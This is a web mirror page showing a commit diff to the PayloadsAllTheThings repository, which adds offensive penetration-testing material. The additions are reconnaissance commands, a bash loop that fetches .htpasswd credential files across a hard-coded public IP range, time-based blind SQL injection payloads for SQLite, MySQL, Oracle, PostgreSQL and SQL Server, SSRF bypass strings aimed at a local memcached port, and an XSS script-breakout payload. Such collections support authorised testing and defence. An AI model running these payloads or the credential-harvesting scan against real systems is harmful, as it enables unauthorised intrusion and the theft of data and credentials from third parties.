ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-18 18:36:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Minor Updates in SQL-SSRF-XSS

Browse Source
This commit is contained in:
swisskyrepo 2017-01-07 20:51:47 +01:00
parent 14a82a14a4
commit bb238f7301
4 changed files with 40 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

16
Methodology_and_enumeration.md
View File

@ -17,6 +17,7 @@ git clone https://github.com/danielmiessler/SecLists.git
knockpy domain.com -w /PATH_TO_SECLISTS/Discover/DNS/subdomains-top1mil-110000.txt knockpy domain.com -w /PATH_TO_SECLISTS/Discover/DNS/subdomains-top1mil-110000.txt
``` ```
Using Google Dorks Using Google Dorks
``` ```
site:*.domain.com -www site:*.domain.com -www
@ -24,6 +25,7 @@ site:http://domain.com ext:php
site:http://domain.com filetype:pdf site:http://domain.com filetype:pdf
``` ```
Using Jason Haddix's enumall Recon-ng script, Using Jason Haddix's enumall Recon-ng script,
``` ```
git clone https://LaNMaSteR53@bitbucket.org/LaNMaSteR53/recon-ng.git git clone https://LaNMaSteR53@bitbucket.org/LaNMaSteR53/recon-ng.git
@ -41,6 +43,7 @@ cd domain
-i to feed a list of domains (can also type extra domains into the original command) -i to feed a list of domains (can also type extra domains into the original command)
``` ```
* Subdomain take over using HostileSubBruteForcer * Subdomain take over using HostileSubBruteForcer
``` ```
git clone https://github.com/nahamsec/HostileSubBruteforcer git clone https://github.com/nahamsec/HostileSubBruteforcer
@ -48,6 +51,7 @@ chmox +x sub_brute.rb
./sub_brute.rb ./sub_brute.rb
``` ```
* EyeWitness and Nmap scans from the KnockPy and enumall scans * EyeWitness and Nmap scans from the KnockPy and enumall scans
``` ```
git clone https://github.com/ChrisTruncer/EyeWitness.git git clone https://github.com/ChrisTruncer/EyeWitness.git
@ -58,6 +62,13 @@ git clone https://github.com/ChrisTruncer/EyeWitness.git
./EyeWitness -f rdp.txt --rdp ./EyeWitness -f rdp.txt --rdp
``` ```
* Passive recon
```
Use shodan to detect similar app
Use the wayback machine to detect forgotten endpoint
```
* Basic NMAP (if allowed ^^') * Basic NMAP (if allowed ^^')
``` ```
sudo nmap -sSV -p- 192.168.0.1 -oA OUTPUTFILE -T4 sudo nmap -sSV -p- 192.168.0.1 -oA OUTPUTFILE -T4
@ -71,6 +82,7 @@ sudo nmap -sSV -oA OUTPUTFILE -T4 -iL INPUTFILE.csv
• -T4 defines the timing for the task (options are 0-5 and higher is faster) • -T4 defines the timing for the task (options are 0-5 and higher is faster)
``` ```
* List all the subdirectories and files * List all the subdirectories and files
Using DirBuster or GoBuster Using DirBuster or GoBuster
@ -86,6 +98,7 @@ More subdomain :
gobuster -w wordlist -u URL -r -e gobuster -w wordlist -u URL -r -e
``` ```
Using a script to detect all phpinfo.php files in a range of IPs (CIDR can be found with a whois) Using a script to detect all phpinfo.php files in a range of IPs (CIDR can be found with a whois)
``` ```
#!/bin/bash #!/bin/bash
@ -100,6 +113,7 @@ for ipa in 98.13{6..9}.{0..255}.{0..255}; do
wget -t 1 -T 3 http://${ipa}/.htpasswd; done & wget -t 1 -T 3 http://${ipa}/.htpasswd; done &
``` ```
* Explore the website with a proxy (ZAP/Burp Suite) * Explore the website with a proxy (ZAP/Burp Suite)
``` ```
- Start ZAP proxy, visit the main target site and perform a Forced Browse to discover files and directories - Start ZAP proxy, visit the main target site and perform a Forced Browse to discover files and directories
@ -107,6 +121,7 @@ wget -t 1 -T 3 http://${ipa}/.htpasswd; done &
- Explore and understand available functionality, noting areas that correspond to vulnerability types - Explore and understand available functionality, noting areas that correspond to vulnerability types
``` ```
* Look for Web Vulns * Look for Web Vulns
``` ```
- SQLi - SQLi
@ -116,6 +131,7 @@ wget -t 1 -T 3 http://${ipa}/.htpasswd; done &
etc etc
``` ```
* Look for private information in GitHub repos with GitRob * Look for private information in GitHub repos with GitRob
``` ```
git clone https://github.com/michenriksen/gitrob.git git clone https://github.com/michenriksen/gitrob.git

12
SQL injection/README.md
View File

@ -170,6 +170,18 @@ admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
``` ```
## Time based
```
SQLite : AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))) comment: -- /**/
MySQL/MariaDB : AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')) //SHA1 comment: # -- /*!30100 MySQL code*/
MySQL/MariaDB : RLIKE SLEEP([SLEEPTIME]) comment: # -- /*!30100 MySQL code*/
MySQL/MariaDB : OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME])) comment: # -- /*!30100 MySQL code*/
Oracle : AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) comment: -- /**/
PostGreSQL : AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) comment: -- /**/
PostGreSQL : AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) comment: -- /**/
SQL Server : IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]' comment: --
```
## Polyglot injection (multicontext) ## Polyglot injection (multicontext)
``` ```
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/ SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/

4
SSRF injection/README.md
View File

@ -30,5 +30,9 @@ Bypass localhost with a domain redirecting to locahost
http://n-pn.info http://n-pn.info
``` ```
-> 11211
localhost:+11211aaa
localhost:00011211aaaa
## Thanks to ## Thanks to
* *

8
XSS injection/README.md
View File

@ -294,6 +294,14 @@ Bypass with incomplete html tag - IE/Firefox/Chrome/Safari
<img src='1' onerror='alert(0)' < <img src='1' onerror='alert(0)' <
``` ```
Bypass using javascript inside a string
```
<script>
foo="text </script><script>alert(1)</script>";
</script>
```
Bypass using an alternate way to execute an alert Bypass using an alternate way to execute an alert
``` ```
<script>window['alert'](0)</script> <script>window['alert'](0)</script>